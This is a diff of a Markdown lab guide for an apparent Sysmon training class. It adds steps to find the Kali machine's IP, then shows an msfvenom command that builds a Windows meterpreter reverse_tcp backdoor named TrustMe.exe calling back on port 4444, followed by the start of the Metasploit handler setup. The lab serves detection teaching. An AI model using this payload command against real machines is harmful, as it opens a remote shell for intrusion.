strandjs/IntroLabs/IntroClassFiles/Tools/IntroClass/Sysmon/Sysmon.md

 <pre>cd /mnt/windows-share</pre>

+Before we run the next commands, we need to get the IP of our Kali System (AKA our Linux IP Adress).
+Lets do so by running the following:

+<pre>ifconfig</pre>

+**REMEMBER: YOUR IP WILL BE DIFFERENT**

 Run the following commands to start a simple backdoor and backdoor listener:

-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>
+<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>

 Let's start the **Metasploit** Handler.
 Open a new **Kali** terminal by clicking the **Kali** icon in the taskbar.